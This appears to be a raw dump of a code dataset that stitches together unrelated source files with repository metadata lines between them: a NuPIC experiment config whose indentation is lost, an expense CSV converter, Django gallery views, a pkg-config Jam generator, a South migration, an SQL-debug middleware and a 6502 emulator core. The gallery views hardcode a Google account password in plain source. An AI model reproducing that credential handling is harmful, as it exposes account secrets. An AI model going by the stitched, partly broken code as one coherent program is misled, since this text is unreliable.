# 'encoders': {'field1': {'fieldname': 'field1', 'n':100,
# 'name': 'field1', 'type': 'AdaptiveScalarEncoder',
# 'w': 21}}
#
'encoders': {
u'data': { 'clipInput': True,
'fieldname': u'data',
'maxval': 1.0,
'minval': -1.0,
'n': 100,
'name': u'data',
'type': 'ScalarEncoder',
'w': 21},
'_classifierInput': { 'classifierOnly': True,
'clipInput': True,
'fieldname': u'data',
'maxval': 1.0,
'minval': -1.0,
'n': 100,
'name': '_classifierInput',
'type': 'ScalarEncoder',
'w': 21},
},
# A dictionary specifying the period for automatically-generated
# resets from a RecordSensor;
#
# None = disable automatically-generated resets (also disabled if
# all of the specified values evaluate to 0).
        # Valid keys are any desired combination of the following:
# days, hours, minutes, seconds, milliseconds, microseconds, weeks
#
# Example for 1.5 days: sensorAutoReset = dict(days=1,hours=12),
#
# (value generated from SENSOR_AUTO_RESET)
'sensorAutoReset' : None,
},
'spEnable': True,
'spParams': {
# Spatial pooler implementation to use.
# Options: "py" (slow, good for debugging), and "cpp" (optimized).
'spatialImp': 'cpp',
# SP diagnostic output verbosity control;
# 0: silent; >=1: some info; >=2: more info;
'spVerbosity' : 0,
'globalInhibition': 1,
# Number of cell columns in the cortical region (same number for
# SP and TP)
# (see also tpNCellsPerCol)
'columnCount': 2048,
'inputWidth': 0,
# SP inhibition control (absolute value);
# Maximum number of active columns in the SP region's output (when
# there are more, the weaker ones are suppressed)
'numActiveColumnsPerInhArea': 40,
'seed': 1956,
# potentialPct
        # What percent of the column's receptive field is available
# for potential synapses.
'potentialPct': 0.8,
# The default connected threshold. Any synapse whose
# permanence value is above the connected threshold is
# a "connected synapse", meaning it can contribute to the
# cell's firing. Typical value is 0.10. Cells whose activity
# level before inhibition falls below minDutyCycleBeforeInh
# will have their own internal synPermConnectedCell
# threshold set below this default value.
# (This concept applies to both SP and TP and so 'cells'
# is correct here as opposed to 'columns')
'synPermConnected': 0.1,
'synPermActiveInc': 0.05,
'synPermInactiveDec': 0.0005,
'maxBoost': 2.0
},
# Controls whether TP is enabled or disabled;
# TP is necessary for making temporal predictions, such as predicting
# the next inputs. Without TP, the model is only capable of
# reconstructing missing sensor inputs (via SP).
'tpEnable' : True,
'tpParams': {
# TP diagnostic output verbosity control;
# 0: silent; [1..6]: increasing levels of verbosity
# (see verbosity in nupic/trunk/py/nupic/research/TP.py and TP10X*.py)
'verbosity': 0,
# Number of cell columns in the cortical region (same number for
# SP and TP)
# (see also tpNCellsPerCol)
'columnCount': 2048,
# The number of cells (i.e., states), allocated per column.
'cellsPerColumn': 32,
'inputWidth': 2048,
'seed': 1960,
# Temporal Pooler implementation selector (see _getTPClass in
# CLARegion.py).
'temporalImp': 'cpp',
# New Synapse formation count
# NOTE: If None, use spNumActivePerInhArea
'newSynapseCount': 20,
# Maximum number of synapses per segment
'maxSynapsesPerSegment': 32,
# Maximum number of segments per cell
'maxSegmentsPerCell': 128,
# Initial Permanence
'initialPerm': 0.21,
# Permanence Increment
'permanenceInc': 0.1,
# Permanence Decrement
# If set to None, will automatically default to tpPermanenceInc
# value.
'permanenceDec' : 0.1,
'globalDecay': 0.0,
'maxAge': 0,
# Minimum number of active synapses for a segment to be considered
# during search for the best-matching segments.
# None=use default
# Replaces: tpMinThreshold
'minThreshold': 12,
# Segment activation threshold.
# A segment is active if it has >= tpSegmentActivationThreshold
# connected synapses that are active due to infActiveState
# None=use default
# Replaces: tpActivationThreshold
'activationThreshold': 16,
'outputType': 'normal',
# "Pay Attention Mode" length. This tells the TP how many new
# elements to append to the end of a learned sequence at a time.
# Smaller values are better for datasets with short sequences,
# higher values are better for datasets with long sequences.
'pamLength': 1,
},
'clParams': {
'regionName' : 'CLAClassifierRegion',
# Classifier diagnostic output verbosity control;
# 0: silent; [1..6]: increasing levels of verbosity
'clVerbosity' : 0,
# This controls how fast the classifier learns/forgets. Higher values
# make it adapt faster and forget older patterns faster.
'alpha': 0.001,
# This is set after the call to updateConfigFromSubConfig and is
# computed from the aggregationInfo and predictAheadTime.
'steps': '1',
},
'anomalyParams': { u'anomalyCacheRecords': None,
u'autoDetectThreshold': None,
u'autoDetectWaitRecords': None},
'trainSPNetOnlyIfRequested': False,
},
}
# end of config dictionary
# Adjust base config dictionary for any modifications if imported from a
# sub-experiment
updateConfigFromSubConfig(config)
# Compute predictionSteps based on the predictAheadTime and the aggregation
# period, which may be permuted over.
if config['predictAheadTime'] is not None:
predictionSteps = int(round(aggregationDivide(
config['predictAheadTime'], config['aggregationInfo'])))
assert (predictionSteps >= 1)
config['modelParams']['clParams']['steps'] = str(predictionSteps)
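# Worked example (illustrative): a predictAheadTime of one hour with a
# 15-minute aggregation period divides to predictionSteps = 4, so the
# classifier would be configured with steps='4'.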
# Adjust config by applying ValueGetterBase-derived
# futures. NOTE: this MUST be called after updateConfigFromSubConfig() in order
# to support value-getter-based substitutions from the sub-experiment (if any)
applyValueGettersToContainer(config)
control = {
# The environment that the current model is being run in
"environment": 'nupic',
# Input stream specification per py/nupic/frameworks/opf/jsonschema/stream_def.json.
#
'dataset' : { u'info': u'sine',
u'streams': [ { u'columns': [u'*'],
u'info': u'sine.csv',
u'last_record': 1800,
u'source': u'file://data/sine.csv'}],
u'version': 1},
# Iteration count: maximum number of iterations. Each iteration corresponds
# to one record from the (possibly aggregated) dataset. The task is
# terminated when either number of iterations reaches iterationCount or
# all records in the (possibly aggregated) database have been processed,
# whichever occurs first.
#
# iterationCount of -1 = iterate over the entire dataset
'iterationCount' : 4000,
# A dictionary containing all the supplementary parameters for inference
"inferenceArgs":{u'inputPredictedField': 'auto',
u'predictedField': u'data',
u'predictionSteps': [1]},
# Metrics: A list of MetricSpecs that instantiate the metrics that are
# computed for this experiment
'metrics':[
MetricSpec(field=u'data', metric='multiStep', inferenceElement='multiStepBestPredictions', params={'window': 1800, 'steps': [1], 'errorMetric': 'aae'}),
MetricSpec(field=u'data', metric='multiStep', inferenceElement='multiStepBestPredictions', params={'window': 1800, 'steps': [1], 'errorMetric': 'nrmse'})
],
# Logged Metrics: A sequence of regular expressions that specify which of
# the metrics from the Inference Specifications section MUST be logged for
# every prediction. The regex's correspond to the automatically generated
# metric labels. This is similar to the way the optimization metric is
# specified in permutations.py.
'loggedMetrics': ['.*'],
}
descriptionInterface = ExperimentDescriptionAPI(modelConfig=config,
control=control)
|
gpl-3.0
| -6,689,820,296,016,079,000
| 35.293103
| 157
| 0.611876
| false
| 4.38694
| true
| false
| false
|
mcxiaoke/python-labs
|
scripts/youqian2toshl.py
|
1
|
1237
|
#!/usr/bin/env python3
import csv
import sys
from datetime import datetime
rows = []
with open(sys.argv[1]) as f:
fc = csv.reader(f)
headers = next(fc)
for r in fc:
di = datetime.strptime(r[0], '%Y-%m-%d')
r_date = datetime.strftime(di, '%m/%d/%y')
r_account = '现金'
r_cate = r[3]
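        # Remap '零食烟酒' ("snacks/tobacco/alcohol") to the plain '零食' ("snacks") category.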
if r_cate == '零食烟酒':
r_cate = '零食'
r_tag = ''
r_out = r[5]
r_in = '0'
r_type = 'CNY'
r_out2 = r[5]
r_type2 = 'CNY'
r_comment = r[4] + ' - '+r[7]
new_row = (r_date, r_account, r_cate, r_tag, r_out,
r_in, r_type, r_out2, r_type2, r_comment)
# print(r)
print(new_row)
rows.append(new_row)
# "日期","账户","类别","标签","支出金额","收入金额","货币","以主要货币","主要货币","说明"
# ('08/13/20', '现金', '零食', '', '35.50', '0', 'CNY', '35.50', 'CNY', '饮料 - 超市买纯净水M')
with open('to.csv', 'w') as f:
fc = csv.writer(f)
fc.writerow(('日期', '账户', '类别', '标签', '支出金额',
'收入金额', '货币', '以主要货币', '主要货币', '说明'))
for r in rows:
fc.writerow(r)
|
apache-2.0
| -8,167,431,639,492,582,000
| 27.447368
| 83
| 0.454209
| false
| 2.140594
| false
| false
| false
|
rivelo/portal
|
gallery/views.py
|
1
|
4808
|
# -*- coding: utf-8 -*-
from django.http import HttpResponse
#from django.shortcuts import render_to_response
from django.shortcuts import render, redirect
from django.template import RequestContext
from django.http import HttpResponseRedirect, HttpRequest, HttpResponseNotFound
from django.conf import settings
from portal.event_calendar.views import embeded_calendar
from portal.funnies.views import get_funn
from models import Album, Photo
import gdata.photos.service
import gdata.media
import gdata.geo
def custom_proc(request):
    """A context processor that provides 'app', 'user' and 'ip_address'."""
return {
'app': 'Rivelo catalog',
'user': request.user,
'ip_address': request.META['REMOTE_ADDR']
}
def get_album():
list = []
album_list = []
gd_client = gdata.photos.service.PhotosService()
gd_client.email = "velorivne@gmail.com"
gd_client.password = "gvelovelo"
gd_client.source = 'velorivne_albums'
gd_client.ProgrammaticLogin()
username = "velorivne@gmail.com"
albums = gd_client.GetUserFeed(user=username)
for album in albums.entry:
print 'title: %s, number of photos: %s, id: %s' % (album.title.text, album.numphotos.text, album.gphoto_id.text)
album_list.append(album.title.text)
photos = gd_client.GetFeed('/data/feed/api/user/%s/albumid/%s?kind=photo' % (username, album.gphoto_id.text))
for photo in photos.entry:
print 'Photo title:', photo.title.text
list.append(photo.content.src)
return list, album_list
def albums_page(request):
photo1 = Photo.objects.random()
photo2 = Photo.objects.random()
albums = Album.objects.all()
vars = {'weblink': 'photo.html', 'sel_menu': 'photo', 'photo1': photo1, 'photo2': photo2, 'albums': albums, 'entry': get_funn()}
calendar = embeded_calendar()
vars.update(calendar)
return render(request, 'index.html', vars)
#return render_to_response('index.html', vars, context_instance=RequestContext(request, processors=[custom_proc]))
def album_page(request, id):
photo1 = Photo.objects.random()
photo2 = Photo.objects.random()
album = Album.objects.get(album_id=id)
album_name = album.title + " - " + str(album.numphotos) + " фото"
photos = Photo.objects.filter(album = album)
vars = {'weblink': 'photo_album.html', 'sel_menu': 'photo', 'photo1': photo1, 'photo2': photo2, 'album_name': album_name, 'photos': photos, 'entry': get_funn()}
calendar = embeded_calendar()
vars.update(calendar)
#return render_to_response('index.html', vars, context_instance=RequestContext(request, processors=[custom_proc]))
return render(request, 'index.html', vars)
def gallery_page(request):
photo1 = Photo.objects.random()
photo2 = Photo.objects.random()
# p_list, albums = get_album()
albums = Album.objects.all()
p_list = Photo.objects.filter(album = albums[3])
vars = {'weblink': 'photo.html', 'sel_menu': 'photo', 'photo_list': p_list[:10], 'photo1': photo1, 'photo2': photo2, 'albums': albums}
calendar = embeded_calendar()
vars.update(calendar)
#p_list = p_list[:10]
# return render_to_response('index.html', {'weblink': 'photo.html', 'sel_menu': 'photo', 'photo_list': p_list[:10], 'albums': albums}, context_instance=RequestContext(request, processors=[custom_proc]))
#return render_to_response('index.html', vars, context_instance=RequestContext(request, processors=[custom_proc]))
return render(request, 'index.html', vars)
def create_db(request):
username = 'rivelo2010@gmail.com'
gd_client = gdata.photos.service.PhotosService()
albums = gd_client.GetUserFeed(user=username)
for album in albums.entry:
print 'title: %s, number of photos: %s, id: %s' % (album.title.text, album.numphotos.text, album.gphoto_id.text)
        try:
            alb = Album(title=album.title.text, url=album.GetHtmlLink().href, numphotos=album.numphotos.text, album_id=album.gphoto_id.text)
            alb.save()
        except:
            # do not duplicate albums; reuse the existing record instead
            alb = Album.objects.get(album_id=album.gphoto_id.text)
photos = gd_client.GetFeed('/data/feed/api/user/%s/albumid/%s?kind=photo' % (username, album.gphoto_id.text))
for photo in photos.entry:
print 'Photo title:', photo.title.text
try:
p = Photo(album=alb, title=photo.title.text, image=photo.media.thumbnail[2].url, url=photo.content.src, pub_date=photo.timestamp.datetime(), filename=photo.media.title.text, photo_id=photo.gphoto_id.text, height=int(photos.entry[0].height.text), width=int(photos.entry[0].width.text))
p.save()
except:
                # do not duplicate photos
pass
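    # "Дані додано" is Ukrainian for "Data added".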
return HttpResponse("Дані додано")
|
gpl-2.0
| 6,949,792,971,498,934,000
| 43.388889
| 300
| 0.664581
| false
| 3.329167
| false
| false
| false
|
vmrob/needy
|
needy/generators/pkgconfig_jam.py
|
1
|
6825
|
from ..generator import Generator
import logging
import os
import subprocess
import textwrap
import hashlib
class PkgConfigJamGenerator(Generator):
@staticmethod
def identifier():
return 'pkgconfig-jam'
def generate(self, needy):
path = os.path.join(needy.needs_directory(), 'pkgconfig.jam')
env = os.environ.copy()
env['PKG_CONFIG_LIBDIR'] = ''
packages, broken_package_names = self.__get_pkgconfig_packages(env=env)
owned_packages = self.__get_owned_packages(needy, packages)
if broken_package_names:
logging.warn('broken packages found: {}'.format(' '.join(broken_package_names)))
contents = self.__get_header(self.__escape(env.get('PKG_CONFIG_PATH', '')))
contents += self.__get_path_targets(needy, packages)
contents += self.__get_pkg_targets(needy, packages)
contents += self.__get_pkgconfig_rules(needy, packages, owned_packages, broken_package_names)
with open(path, 'w') as f:
f.write(contents)
@classmethod
def __get_pkgconfig_packages(cls, env):
packages = []
broken_package_names = []
package_names = [line.split()[0] for line in subprocess.check_output(['pkg-config', '--list-all'], env=env).decode().splitlines()]
for package in package_names:
try:
pkg = {}
pkg['name'] = package
pkg['location'] = os.path.realpath(subprocess.check_output(['pkg-config', package, '--variable=pcfiledir'], env=env).decode().strip())
pkg['cflags'] = subprocess.check_output(['pkg-config', package, '--cflags'], env=env).decode().strip()
pkg['ldflags'] = subprocess.check_output(['pkg-config', package, '--libs', '--static'], env=env).decode().strip()
packages.append(pkg)
except subprocess.CalledProcessError:
broken_package_names.append(package)
continue
return packages, broken_package_names
@classmethod
def __get_owned_packages(cls, needy, packages):
owned_packages = []
for package in packages:
if not os.path.relpath(package['location'], os.path.realpath(needy.needs_directory())).startswith('..'):
owned_packages.append(package)
return owned_packages
@classmethod
def __get_header(cls, pkg_config_path):
return textwrap.dedent('''\
INSTALL_PREFIX = [ option.get prefix : "/usr/local" ] ;
PKG_CONFIG_PATH = "{pkg_config_path}" ;
import notfile ;
import project ;
local p = [ project.current ] ;
''').format(
pkg_config_path=pkg_config_path
)
@classmethod
def __get_path_targets(cls, needy, packages):
lines = ''
paths = set([os.path.abspath(os.path.join(p['location'], '..', '..')) for p in packages])
for path in paths:
path_hash = hashlib.sha256(path.encode('utf-8')).hexdigest().lower()
# This is the worst. Specifically, Boost Build is the worst. Their semaphore
# targets appear to be entirely broken (in addition to factually incorrect
# documentation) and so we have to write our own semaphore to ensure that
# this sort of file copying to $(INSTALL_PREFIX) occurs atomically.
#
# The reason this is necessary at all is due to a race condition in
# cp/mkdir of the destination path that errors on duplicate
# files/directories even in the presence of the -p flag.
lines += textwrap.dedent('''\
actions copy-path-{path_hash}-action {{
set -e ; trap "{{ rmdir $(INSTALL_PREFIX)/needy-copy-path.lock 2>/dev/null || true ; }}" EXIT TERM INT
mkdir -p $(INSTALL_PREFIX) && test -d $(INSTALL_PREFIX) && test -w $(INSTALL_PREFIX)
until mkdir -p $(INSTALL_PREFIX)/needy-copy-path.lock 2>/dev/null ; do python -c "import time;time.sleep(0.1)" ; done
cp -pR {path}/* $(INSTALL_PREFIX)/
}}
notfile.notfile copy-path-{path_hash} : @$(__name__).copy-path-{path_hash}-action ;
$(p).mark-target-as-explicit copy-path-{path_hash} ;
''').format(path_hash=path_hash, path=path)
return lines
@classmethod
def __get_pkg_targets(cls, needy, packages):
lines = ''
for package in packages:
path = os.path.abspath(os.path.join(package['location'], '..', '..'))
path_hash = hashlib.sha256(path.encode('utf-8')).hexdigest().lower()
lines += 'alias {}-package : : : : <cflags>"{}" <linkflags>"{}" ;\n'.format(package['name'], PkgConfigJamGenerator.__escape(package['cflags']), PkgConfigJamGenerator.__escape(package['ldflags']))
lines += textwrap.dedent('''\
alias install-{package}-package : copy-path-{path_hash} ;
''').format(package=package['name'], path_hash=path_hash)
if not os.path.relpath(package['location'], os.path.realpath(needy.needs_directory())).startswith('..'):
lines += 'alias install-{package}-package-if-owned : install-{package}-package ;\n'.format(package=package['name'])
else:
lines += 'alias install-{package}-package-if-owned ;\n'.format(package=package['name'])
lines += textwrap.dedent('''\
$(p).mark-target-as-explicit install-{package}-package install-{package}-package-if-owned ;
''').format(package=package['name'])
return lines
@classmethod
def __get_pkgconfig_rules(cls, needy, packages, owned_packages, broken_package_names):
return textwrap.dedent('''\
PKG_CONFIG_PACKAGES = {pkg_config_packages} ;
OWNED_PKG_CONFIG_PACKAGES = {owned_pkg_config_packages} ;
rule dependency ( name : packages * ) {{
if ! $(packages) {{
packages = $(name) ;
}}
if $(packages) in $(PKG_CONFIG_PACKAGES) {{
alias $(name) : $(packages)-package ;
alias install-$(name)-if-owned : install-$(packages)-package-if-owned ;
local p = [ project.current ] ;
$(p).mark-target-as-explicit install-$(name)-if-owned ;
}}
}}
''').format(
pkg_config_packages=' '.join([package['name'] for package in packages if package['name'] not in broken_package_names]),
owned_pkg_config_packages=' '.join([p['name'] for p in owned_packages])
)
@classmethod
def __escape(cls, s):
return s.replace('\\', '\\\\').replace('"', '\\"')
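# A rough sketch of how a consuming Jamfile might use the generated rule
# (file location and target names are illustrative):
#
#   include needs/pkgconfig.jam ;
#   dependency zlib ;            # alias 'zlib' to the pkg-config cflags/libs
#   dependency png : libpng ;    # local name 'png' backed by package 'libpng'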
|
mit
| 410,549,216,565,586,900
| 44.5
| 207
| 0.572161
| false
| 4.113924
| true
| false
| false
|
jammon/gemeinde
|
gottesdienste/migrations/0004_auto__add_field_gottesdienst_dauer__add_field_gottesdienst_ort.py
|
1
|
2642
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Gottesdienst.dauer'
db.add_column(u'gottesdienste_gottesdienst', 'dauer',
self.gf('django.db.models.fields.IntegerField')(default=60),
keep_default=False)
# Adding field 'Gottesdienst.ort'
db.add_column(u'gottesdienste_gottesdienst', 'ort',
self.gf('django.db.models.fields.CharField')(default='', max_length=50, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Gottesdienst.dauer'
db.delete_column(u'gottesdienste_gottesdienst', 'dauer')
# Deleting field 'Gottesdienst.ort'
db.delete_column(u'gottesdienste_gottesdienst', 'ort')
models = {
u'gottesdienste.gottesdienst': {
'Meta': {'object_name': 'Gottesdienst'},
'datum': ('django.db.models.fields.DateTimeField', [], {}),
'dauer': ('django.db.models.fields.IntegerField', [], {'default': '60'}),
'freitext': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
u'keywords_string': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'ort': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
'prediger': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
'prediger_key': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['gottesdienste.Prediger']", 'null': 'True', 'blank': 'True'}),
'predigttext': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'titel': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'})
},
u'gottesdienste.prediger': {
'Meta': {'object_name': 'Prediger'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nachname': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'titel': ('django.db.models.fields.CharField', [], {'max_length': '10', 'blank': 'True'}),
'vorname': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'})
}
}
complete_apps = ['gottesdienste']
|
mit
| 1,991,793,960,841,552,400
| 48.867925
| 154
| 0.571537
| false
| 3.440104
| false
| false
| false
|
katharine-kinn/django-sql-debugger
|
sql_debugger/middleware.py
|
1
|
1318
|
import json
from django.db import connections, connection
from django.conf import settings
__all__ = ['SQLDebugMiddleware']
class SQLDebugMiddleware(object):
def process_response(self, request, response):
if not settings.DEBUG:
return response
if request.is_ajax():
if response.status_code / 100 == 2:
try:
resp_d = json.loads(response.content)
resp_d['path'] = request.get_full_path()
resp_d['sql_debug_info'] = connection.queries
response.content = json.dumps(resp_d)
except Exception, e:
pass
else:
parts = {
"traceback": "Traceback"
}
empty_line = '\n\n'
resp_parts = response.content.split(empty_line)
res = { "error": resp_parts[0] }
for rp in resp_parts:
for k,p in parts.iteritems():
if rp.startswith(p):
res[k] = rp
response.content = json.dumps(
{
"errordata": res, "path": request.get_full_path()
}
)
return response
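# Hypothetical wiring in settings.py (old-style Django middleware; the dotted
# path is assumed from this module's location in the repo):
#
#   MIDDLEWARE_CLASSES = (
#       'sql_debugger.middleware.SQLDebugMiddleware',
#       # ... the rest of the middleware stack ...
#   )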
|
mit
| 3,783,446,745,468,610,600
| 28.954545
| 73
| 0.455994
| false
| 4.827839
| false
| false
| false
|
ajgrah2000/pytari2600
|
pytari2600/cpu_gen/core.py
|
1
|
34536
|
from . import addressing
from . import instructions
from . import pc_state
class OpDecoder(object):
def __init__(self, pc_state, memory, instruction_lookup):
self.pc_state = pc_state
self.memory = memory
self.instruction_lookup = instruction_lookup
def execute(self):
""" On first execution, replace the 'execute' call with more
direct/custom/generated function. """
op_code = self.memory.read(self.pc_state.PC)
instruction = self.instruction_lookup[op_code].clone()
        # Calls 'execute' first, to allow it to 'replace itself'
instruction.execute()
self.execute = instruction.execute
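        # Subsequent calls on this decoder instance go straight to the cached
        # instruction's execute, skipping the op-code lookup entirely.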
class Core(object):
"""
CPU Core - Contains op code mappings.
"""
def __init__(self, clocks, memory, pc_state):
self.clocks = clocks
self.memory = memory
self.pc_state = pc_state
# Different addressing modes
self.aIZX = addressing.AddressIZX(self.pc_state, self.memory)
self.aIZY = addressing.AddressIZY(self.pc_state, self.memory)
self.aIMM = addressing.AddressIMM(self.pc_state, self.memory)
self.aZP = addressing.AddressZP (self.pc_state, self.memory)
self.aZPX = addressing.AddressZPX(self.pc_state, self.memory)
self.aZPY = addressing.AddressZPY(self.pc_state, self.memory)
self.aAbs = addressing.AddressAbs(self.pc_state, self.memory)
self.aAbx = addressing.AddressAbx(self.pc_state, self.memory)
self.aAby = addressing.AddressAby(self.pc_state, self.memory)
self.aInd = addressing.AddressIndirect(self.pc_state, self.memory)
self.aAcc = addressing.AddressAccumulator(self.pc_state, self.memory)
# Different instruction types
self.r = instructions.Reading(self.pc_state, self.memory)
self.nullR = instructions.NullReading(self.pc_state, self.memory)
self.aR = instructions.AccumulatorReading(self.pc_state, self.memory)
self.w = instructions.Writing(self.pc_state, self.memory)
self.regW = instructions.RegWriting(self.pc_state, self.memory)
self.nullW = instructions.NullWriting(self.pc_state, self.memory)
self.aW = instructions.AccumulatorWriting(self.pc_state, self.memory)
self.instruction_exe = instructions.InstructionExec(self.pc_state)
self.instruction_lookup = [False] * 256
self.PROGRAM_ENTRY_ADDR = 0xFFFC
self.memory = memory
self.pc_state.P.value = 0
self.pc_state.PC = 0x1000
# Generate instances of the op decoder
self.op_decoder = [OpDecoder(pc_state, memory, self.instruction_lookup) for x in range(0x10000)]
def get_save_state(self):
state = {}
state['pc_state'] = self.pc_state.get_save_state()
return state
def set_save_state(self, state):
self.pc_state.set_save_state(state['pc_state'])
def reset(self):
# 6502 Reset vector location.
self.pc_state.PC = self.memory.read16(self.PROGRAM_ENTRY_ADDR)
def initialise(self):
# 6502 Reset vector location.
self.populate_instruction_map()
def step(self):
self.op_decoder[self.memory.cartridge.get_absolute_address(self.pc_state.PC)].execute()
def populate_instruction_map(self):
dummy = pc_state.PC_Register()
# Single byte instructions (including ASL, ROL and LSR in accumulator modes)
self.instruction_lookup[0xEA] = instructions.SingleByteInstruction(self.clocks, self.pc_state, self.pc_state.A, self.pc_state.A, self.instruction_exe.NOP_exec)
self.instruction_lookup[0x0A] = instructions.SingleByteInstruction(self.clocks, self.pc_state, self.pc_state.A, self.pc_state.A, self.instruction_exe.ASL_exec)
self.instruction_lookup[0x4A] = instructions.SingleByteInstruction(self.clocks, self.pc_state, self.pc_state.A, self.pc_state.A, self.instruction_exe.LSR_exec)
self.instruction_lookup[0xE8] = instructions.SingleByteInstruction(self.clocks, self.pc_state, self.pc_state.X, self.pc_state.X, self.instruction_exe.INC_exec)
self.instruction_lookup[0xC8] = instructions.SingleByteInstruction(self.clocks, self.pc_state, self.pc_state.Y, self.pc_state.Y, self.instruction_exe.INC_exec)
self.instruction_lookup[0xCA] = instructions.SingleByteInstruction(self.clocks, self.pc_state, self.pc_state.X, self.pc_state.X, self.instruction_exe.DEC_exec)
self.instruction_lookup[0x88] = instructions.SingleByteInstruction(self.clocks, self.pc_state, self.pc_state.Y, self.pc_state.Y, self.instruction_exe.DEC_exec)
self.instruction_lookup[0x18] = instructions.SingleByteInstruction(self.clocks, self.pc_state, dummy, dummy, self.instruction_exe.CLC_exec)
self.instruction_lookup[0xD8] = instructions.SingleByteInstruction(self.clocks, self.pc_state, dummy, dummy, self.instruction_exe.CLD_exec)
self.instruction_lookup[0x58] = instructions.SingleByteInstruction(self.clocks, self.pc_state, dummy, dummy, self.instruction_exe.CLI_exec)
self.instruction_lookup[0xB8] = instructions.SingleByteInstruction(self.clocks, self.pc_state, dummy, dummy, self.instruction_exe.CLV_exec)
self.instruction_lookup[0x38] = instructions.SingleByteInstruction(self.clocks, self.pc_state, dummy, dummy, self.instruction_exe.SEC_exec)
self.instruction_lookup[0x78] = instructions.SingleByteInstruction(self.clocks, self.pc_state, dummy, dummy, self.instruction_exe.SEI_exec)
self.instruction_lookup[0xF8] = instructions.SingleByteInstruction(self.clocks, self.pc_state, dummy, dummy, self.instruction_exe.SED_exec)
# Break instruction, software 'interrupt'
self.instruction_lookup[0x00] = instructions.BreakInstruction(self.clocks, self.pc_state, self.memory, None)
# Register Transfers
self.instruction_lookup[0x9A] = instructions.SingleByteInstruction(self.clocks, self.pc_state, self.pc_state.X, self.pc_state.S, self.instruction_exe.TNoStatus_exec)
self.instruction_lookup[0xBA] = instructions.SingleByteInstruction(self.clocks, self.pc_state, self.pc_state.S, self.pc_state.X, self.instruction_exe.TNoStatus_exec)
self.instruction_lookup[0x8A] = instructions.SingleByteInstruction(self.clocks, self.pc_state, self.pc_state.X, self.pc_state.A, self.instruction_exe.TStatus_exec)
self.instruction_lookup[0xAA] = instructions.SingleByteInstruction(self.clocks, self.pc_state, self.pc_state.A, self.pc_state.X, self.instruction_exe.TStatus_exec)
self.instruction_lookup[0xA8] = instructions.SingleByteInstruction(self.clocks, self.pc_state, self.pc_state.A, self.pc_state.Y, self.instruction_exe.TStatus_exec)
self.instruction_lookup[0x98] = instructions.SingleByteInstruction(self.clocks, self.pc_state, self.pc_state.Y, self.pc_state.A, self.instruction_exe.TStatus_exec)
# ADC
self.instruction_lookup[0x61] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIZX, self.r, self.nullW, self.instruction_exe.ADC_exec)
self.instruction_lookup[0x69] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIMM, self.r, self.nullW, self.instruction_exe.ADC_exec)
self.instruction_lookup[0x65] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.r, self.nullW, self.instruction_exe.ADC_exec)
self.instruction_lookup[0x75] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPX, self.r, self.nullW, self.instruction_exe.ADC_exec)
self.instruction_lookup[0x71] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIZY, self.r, self.nullW, self.instruction_exe.ADC_exec)
self.instruction_lookup[0x6D] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbs, self.r, self.nullW, self.instruction_exe.ADC_exec)
self.instruction_lookup[0x7D] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbx, self.r, self.nullW, self.instruction_exe.ADC_exec)
self.instruction_lookup[0x79] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAby, self.r, self.nullW, self.instruction_exe.ADC_exec)
# ASL
self.instruction_lookup[0x06] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.r, self.w, self.instruction_exe.ASL_exec)
self.instruction_lookup[0x16] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPX, self.r, self.w, self.instruction_exe.ASL_exec)
self.instruction_lookup[0x0E] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbs, self.r, self.w, self.instruction_exe.ASL_exec)
self.instruction_lookup[0x1E] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbx, self.r, self.w, self.instruction_exe.ASL_exec)
# AND
self.instruction_lookup[0x21] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIZX, self.r, self.nullW, self.instruction_exe.AND_exec)
self.instruction_lookup[0x29] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIMM, self.r, self.nullW, self.instruction_exe.AND_exec)
self.instruction_lookup[0x25] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.r, self.nullW, self.instruction_exe.AND_exec)
self.instruction_lookup[0x35] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPX, self.r, self.nullW, self.instruction_exe.AND_exec)
self.instruction_lookup[0x31] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIZY, self.r, self.nullW, self.instruction_exe.AND_exec)
self.instruction_lookup[0x2D] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbs, self.r, self.nullW, self.instruction_exe.AND_exec)
self.instruction_lookup[0x3D] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbx, self.r, self.nullW, self.instruction_exe.AND_exec)
self.instruction_lookup[0x39] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAby, self.r, self.nullW, self.instruction_exe.AND_exec)
# BIT
self.instruction_lookup[0x24] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.r, self.nullW, self.instruction_exe.BIT_exec)
